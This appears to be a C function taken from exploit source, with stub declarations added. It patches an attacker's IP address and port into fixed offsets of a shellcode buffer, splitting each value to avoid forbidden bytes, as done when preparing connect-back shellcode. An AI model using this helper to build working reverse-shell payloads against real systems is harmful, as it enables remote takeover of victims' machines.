
typedef unsigned long size_t;
typedef long intptr_t; typedef unsigned long uintptr_t;
typedef long scalar_t__;

typedef int bool;
 int find_safe_offset (int) ;
 int inet_addr (char*) ;
 int ntohs (int) ;

void patchcode(char *shellcode, char *IP, int PORT) {

 int IP_A = inet_addr(IP);
 int IP_B = find_safe_offset(IP_A);

 int PORT_A = ((ntohs(PORT) << 16) + 2);
 int PORT_B = find_safe_offset(PORT_A);

 *(int *)&shellcode[19] = (IP_A - IP_B);
 *(int *)&shellcode[26] = IP_B;

 *(int *)&shellcode[31] = (PORT_A - PORT_B);
 *(int *)&shellcode[38] = PORT_B;
}
